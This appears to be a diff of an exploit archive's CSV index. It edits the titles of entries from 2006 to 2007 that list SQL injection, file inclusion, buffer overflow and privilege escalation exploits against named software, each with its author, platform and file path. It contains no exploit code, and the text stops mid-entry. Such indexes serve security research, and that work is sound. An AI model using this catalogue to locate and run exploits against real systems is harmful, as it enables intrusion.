3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 @@ -2709,7 +2709,7 @@ id,file,description,date,author,platform,type,port 3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0 3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0 3036,platforms/php/webapps/3036.php,"WebText <= 0.4.5.2 - Remote Code Execution Exploit",2006-12-28,Kacper,php,webapps,0 -3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 Remote Buffer Overflow Exploit",2006-12-29,rgod,windows,remote,4002 +3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow Exploit",2006-12-29,rgod,windows,remote,4002 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 Denial of Service Exploit",2006-12-29,rgod,windows,dos,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability",2006-12-29,bd0rk,php,webapps,0 3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service",2006-12-29,shinnai,windows,dos,0 @@ -2755,18 +2755,18 @@ id,file,description,date,author,platform,type,port 3081,platforms/asp/webapps/3081.pl,"DigiRez <= 3.4 (book_id) Remote SQL Injection Exploit",2007-01-04,ajann,asp,webapps,0 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 (user.php id variable) Remote SQL Injection Vulnerability",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 (eval/SQL Injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 -3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability",2007-01-05,"Stefano Di Paola",windows,remote,0 +3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin <= 7.0.x - (acroreader) XSS Vulnerability",2007-01-05,"Stefano Di Paola",windows,remote,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery <= 1.4.10 Remote SQL Injection Exploit",2007-01-05,DarkFig,php,webapps,0 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve (tapeeng.exe) Remote Buffer Overflow Exploit",2007-01-05,"Winny Thomas",windows,remote,6502 3087,platforms/osx/local/3087.rb,"Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit",2007-01-05,MoAB,osx,local,0 3088,platforms/osx/local/3088.rb,"Mac OS X 10.4.8 DiskManagement BOM (cron) Privilege Escalation Exploit",2007-01-05,MoAB,osx,local,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 -3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 Multiple Remote File Include Vulnerabilities",2007-01-06,"Mehmet Ince",php,webapps,0 +3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Include Vulnerabilities",2007-01-06,"Mehmet Ince",php,webapps,0 3091,platforms/php/webapps/3091.php,"L2J Statistik Script <= 0.09 (index.php page) Local File Include Exploit",2007-01-07,Codebreak,php,webapps,0 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta",2007-01-07,"Jacopo Cervini",windows,remote,80 3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit",2007-01-07,"Critical Security",bsd,local,0 -3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 +3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 Trackback UTF-7 - Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 - (index.php) Remote File Include Vulnerability",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability",2007-01-07,bd0rk,php,webapps,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0 @@ -2796,7 +2796,7 @@ id,file,description,date,author,platform,type,port 3122,platforms/asp/webapps/3122.pl,"DigiAffiliate <= 1.4 (visu_user.asp id) Remote SQL Injection Exploit",2007-01-13,ajann,asp,webapps,0 3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre <= 2.01 (path) Remote File Include Exploit",2007-01-13,ajann,php,webapps,0 3124,platforms/php/webapps/3124.php,"ThWboard <= 3.0b2.84-php5 SQL Injection / Code Execution Exploit",2007-01-14,rgod,php,webapps,0 -3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 0 - (download.php) Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 +3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - (download.php) Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP (USER) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 @@ -2806,7 +2806,7 @@ id,file,description,date,author,platform,type,port 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143 3134,platforms/php/webapps/3134.php,"KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability",2007-01-15,"ilker Kandemir",asp,webapps,0 -3137,platforms/windows/remote/3137.html,"MS Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 +3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit",2003-07-07,N/A,windows,dos,0 3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 @@ -2817,7 +2817,7 @@ id,file,description,date,author,platform,type,port 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include Vulnerability",2007-01-17,v1per-haCker,php,webapps,0 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 (frontpage.php) Remote File Include Vulnerability",2007-01-17,GoLd_M,php,webapps,0 -3148,platforms/windows/remote/3148.pl,"MS Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 +3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0 3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 (lang/index.php file) Remote InclusionVulnerability",2007-01-17,3l3ctric-Cracker,php,webapps,0 3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0 @@ -2874,7 +2874,7 @@ id,file,description,date,author,platform,type,port 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider Buffer Overflow PoC",2007-01-26,"Andres Tarasco",windows,dos,0 3205,platforms/php/webapps/3205.txt,"nsGalPHP (includes/config.inc.php racineTBS) Remote Inclusion Vuln",2007-01-27,S.W.A.T.,php,webapps,0 3206,platforms/php/webapps/3206.txt,"ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability",2007-01-27,ajann,php,webapps,0 -3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 Remote File Include Exploit",2007-01-27,MackRulZ,php,webapps,0 +3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Include Exploit",2007-01-27,MackRulZ,php,webapps,0 3208,platforms/php/webapps/3208.txt,"ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability",2007-01-27,ajann,php,webapps,0 3209,platforms/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Include (RFI) Vulnerability",2007-01-27,"ThE dE@Th",php,webapps,0 3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability",2007-01-27,ajann,asp,webapps,0 @@ -2888,7 +2888,7 @@ id,file,description,date,author,platform,type,port 3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit 2",2007-01-28,"Jacopo Cervini",windows,remote,6503 3219,platforms/osx/local/3219.rb,"Mac OS X 10.4.8 (8L2127) crashdump Privilege Escalation Exploit",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation Exploit",2007-01-29,"Andres Tarasco",windows,local,0 -3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 +3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability",2007-01-29,GoLd_M,php,webapps,0 3223,platforms/cgi/webapps/3223.pl,"CVSTrac 2.0.0 Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,webapps,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 @@ -2897,7 +2897,7 @@ id,file,description,date,author,platform,type,port 3227,platforms/php/webapps/3227.txt,"CascadianFAQ <= 4.1 (index.php) Remote SQL Injection Vulnerability",2007-01-30,ajann,php,webapps,0 3228,platforms/php/webapps/3228.txt,"MyNews <= 4.2.2 (themefunc.php) Remote File Include Vulnerability",2007-01-30,GoLd_M,php,webapps,0 3229,platforms/windows/dos/3229.py,"Dev-C++ 4.9.9.2 CPP File Parsing Local Stack Overflow PoC",2007-01-30,shinnai,windows,dos,0 -3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 Multiple Denial of Service Exploit",2007-01-30,MoAB,osx,dos,0 +3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Exploit",2007-01-30,MoAB,osx,dos,0 3231,platforms/php/webapps/3231.txt,"phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability",2007-01-30,"Mehmet Ince",php,webapps,0 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc <= 4 - Remote SQL Injection Vulnerability",2007-01-31,Codebreak,php,webapps,0 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi (tr) SQL Injection Vulnerability",2007-01-31,cl24zy,asp,webapps,0 @@ -2938,12 +2938,12 @@ id,file,description,date,author,platform,type,port 3268,platforms/php/webapps/3268.txt,"SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability",2007-02-05,"ThE dE@Th",php,webapps,0 3269,platforms/multiple/remote/3269.pl,"Oracle 9i/10g DBMS_EXPORT_EXTENSION SQL Injection Exploit",2007-02-05,bunker,multiple,remote,0 3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 -3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 -3272,platforms/windows/dos/3272.html,"MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 +3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 - Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 +3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306 3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability",2007-02-06,ajann,php,webapps,0 -3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 +3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0 3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 (tr) Remote SQL Injection Vulnerability",2007-02-06,cl24zy,php,webapps,0 3279,platforms/windows/remote/3279.html,"Alibaba Alipay (Remove ActiveX) Remote Code Execution Exploit",2007-02-06,cocoruder,windows,remote,0 @@ -2956,8 +2956,8 @@ id,file,description,date,author,platform,type,port 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 3287,platforms/php/webapps/3287.asp,"LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit",2007-02-08,ajann,php,webapps,0 -3289,platforms/linux/dos/3289.c,"Axigen <= 2.0.0b1 Remote Denial of Service Exploit",2007-02-08,mu-b,linux,dos,0 -3290,platforms/linux/dos/3290.c,"Axigen <= 2.0.0b1 Remote Denial of Service Exploit (2)",2007-02-08,mu-b,linux,dos,0 +3289,platforms/linux/dos/3289.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit",2007-02-08,mu-b,linux,dos,0 +3290,platforms/linux/dos/3290.c,"Axigen <= 2.0.0b1 - Remote Denial of Service Exploit (2)",2007-02-08,mu-b,linux,dos,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability",2007-02-11,y3dips,php,webapps,0 3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 @@ -2965,7 +2965,7 @@ id,file,description,date,author,platform,type,port 3295,platforms/asp/webapps/3295.txt,"Philboard <= 1.14 (philboard_forum.asp) SQL Injection Vulnerability",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 (announce) Key Remote Heap Overflow Exploit",2007-02-12,defsec,windows,remote,0 3297,platforms/php/webapps/3297.htm,"AT Contenator <= 1.0 - (Root_To_Script) Remote File Include Exploit",2007-02-13,ajann,php,webapps,0 -3298,platforms/php/webapps/3298.pl,"Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 +3298,platforms/php/webapps/3298.pl,"Xaran CMS <= 2.0 (xarancms_haupt.php) SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 3299,platforms/php/webapps/3299.pl,"phpCC <= 4.2 beta (nickpage.php npid) Remote SQL Injection Exploit",2007-02-13,ajann,php,webapps,0 3300,platforms/php/webapps/3300.pl,"Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability",2007-02-13,SaO,asp,webapps,0 @@ -2985,7 +2985,7 @@ id,file,description,date,author,platform,type,port 3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability",2007-02-15,Cr@zy_King,php,webapps,0 3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability",2007-02-15,beks,asp,webapps,0 3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability",2007-02-15,"Mehmet Ince",asp,webapps,0 -3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise <= 2.32 - 2.34 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 +3319,platforms/windows/remote/3319.pl,"MailEnable Enterprise <= 2.32 - 2.34 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3320,platforms/windows/remote/3320.pl,"MailEnable Professional 2.35 - Remote Buffer Overflow Exploit",2007-02-16,mu-b,windows,remote,143 3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - (pop_profile.asp) SQL Injection Vulnerability",2007-02-16,"Mehmet Ince",asp,webapps,0 3322,platforms/php/webapps/3322.htm,"VS-News-System <= 1.2.1 (newsordner) Remote File Include Exploit",2007-02-16,ajann,php,webapps,0 @@ -3008,7 +3008,7 @@ id,file,description,date,author,platform,type,port 3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 (id) Remote SQL Injection Vulnerability",2007-02-20,"Mehmet Ince",asp,webapps,0 3340,platforms/windows/remote/3340.html,"Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerability",2007-02-20,"Michal Zalewski",windows,remote,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 (newline/LIST) Multiple Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 -3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 Remote Stack Overflow Exploit",2007-02-20,Marsu,windows,local,0 +3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow Exploit",2007-02-20,Marsu,windows,local,0 3343,platforms/windows/dos/3343.cpp,"FTP Voyager <= 14.0.0.3 (CWD) Remote Stack Overflow Exploit PoC",2007-02-20,Marsu,windows,dos,0 3344,platforms/php/webapps/3344.pl,"PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)",2007-02-20,krasza,php,webapps,0 3345,platforms/php/webapps/3345.pl,"PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit",2007-02-20,krasza,php,webapps,0 @@ -3034,9 +3034,9 @@ id,file,description,date,author,platform,type,port 3365,platforms/php/webapps/3365.txt,"FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability",2007-02-23,kezzap66345,php,webapps,0 3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability",2007-02-23,kezzap66345,php,webapps,0 3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability",2007-02-23,kezzap66345,php,webapps,0 -3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)",2007-02-24,"Umesh Wanve",windows,local,0 +3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow Exploit (perl)",2007-02-24,"Umesh Wanve",windows,local,0 3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 -3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit",2007-02-24,s0cratex,php,webapps,0 +3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Remote Blind SQL Injection Exploit",2007-02-24,s0cratex,php,webapps,0 3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 (index.php album) Remote File Include Exploit",2007-02-24,burncycle,php,webapps,0 3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Include Exploit",2007-02-24,bd0rk,php,webapps,0 3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 (top.php laypath) Remote File Include Vulnerability",2007-02-25,GoLd_M,php,webapps,0 @@ -3055,7 +3055,7 @@ id,file,description,date,author,platform,type,port 3387,platforms/php/webapps/3387.php,"vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit",2007-02-28,rgod,php,webapps,0 3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Exploit (perl)",2007-02-28,"Umesh Wanve",windows,remote,69 3389,platforms/linux/remote/3389.c,"madwifi <= 0.9.2.1 WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 -3390,platforms/asp/webapps/3390.txt,"Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability",2007-03-01,"Craig Heffner",asp,webapps,0 +3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 (default.asp id) Remote SQL Injection Vulnerability",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 (npdivx32.dll) Remote Denial of Service Exploit",2007-03-01,shinnai,windows,dos,0 3393,platforms/php/webapps/3393.php,"phpMyFAQ <= 1.6.7 - Remote SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 @@ -3065,8 +3065,8 @@ id,file,description,date,author,platform,type,port 3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader <= 1.2 (ipath) Remote File Include Vulnerability",2007-03-02,mozi,php,webapps,0 3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0 -3400,platforms/php/webapps/3400.pl,"webSPELL <= 4.01.02 Multiple Remote SQL Injection Exploit",2007-03-02,DNX,php,webapps,0 -3402,platforms/php/webapps/3402.php,"webSPELL <= 4.01.02 Remote PHP Code Execution Exploit",2007-03-03,DarkFig,php,webapps,0 +3400,platforms/php/webapps/3400.pl,"webSPELL <= 4.01.02 - Multiple Remote SQL Injection Exploit",2007-03-02,DNX,php,webapps,0 +3402,platforms/php/webapps/3402.php,"webSPELL <= 4.01.02 - Remote PHP Code Execution Exploit",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Remote Blind SQL Injection Exploit",2007-03-04,s0cratex,php,webapps,0 3404,platforms/multiple/dos/3404.php,"PHP wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability",2007-03-04,"Stefan Esser",multiple,remote,0 @@ -3107,8 +3107,8 @@ id,file,description,date,author,platform,type,port 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 zip:// URL Wrapper BoF Exploit",2007-03-09,"Stefan Esser",linux,local,0 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow Exploit PoC",2007-03-09,"Daniel Roethlisberger",linux,dos,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",2007-03-09,rgod,multiple,local,0 -3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 Multiple Remote File Inclusion Vulnerability",2007-03-09,K-159,php,webapps,0 -3444,platforms/windows/dos/3444.pl,"MS Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 +3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 - Multiple Remote File Inclusion Vulnerability",2007-03-09,K-159,php,webapps,0 +3444,platforms/windows/dos/3444.pl,"Microsoft Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns",2007-03-09,Omni,php,webapps,0 3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability",2007-03-10,WiLdBoY,php,webapps,0 @@ -3162,7 +3162,7 @@ id,file,description,date,author,platform,type,port 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerability",2007-03-16,"Mehmet Ince",php,webapps,0 3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 -3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0 +3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0 3502,platforms/php/webapps/3502.php,"Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 (view.php logi) Local File Include Vulnerability",2007-03-17,GoLd_M,php,webapps,0 3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes <= 0.2.5 - Remote File Inclusion Exploit",2007-03-17,GoLd_M,php,webapps,0 @@ -3175,7 +3175,7 @@ id,file,description,date,author,platform,type,port 3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating <= 2.0 - Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 3512,platforms/php/webapps/3512.txt,"iFrame for Phpnuke (iframe.php) Remote File Inclusion Vulnerability",2007-03-18,"Cold Zero",php,webapps,0 3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) <= 1.0 - Remote SQL Injection Exploit",2007-03-18,Kacper,php,webapps,0 -3514,platforms/windows/dos/3514.pl,"Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 +3514,platforms/windows/dos/3514.pl,"Avant Browser <= 11.0 build 26 - Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics <= 2.0 (index.php recid) SQL Injection Exploit",2007-03-19,ajann,php,webapps,0 3516,platforms/php/webapps/3516.php,"MetaForum <= 0.513 Beta Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 3517,platforms/osx/local/3517.php,"PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-19,"Stefan Esser",osx,local,0 @@ -3187,7 +3187,7 @@ id,file,description,date,author,platform,type,port 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln",2007-03-20,"Cold Zero",php,webapps,0 3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 -3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 Remote Denial of 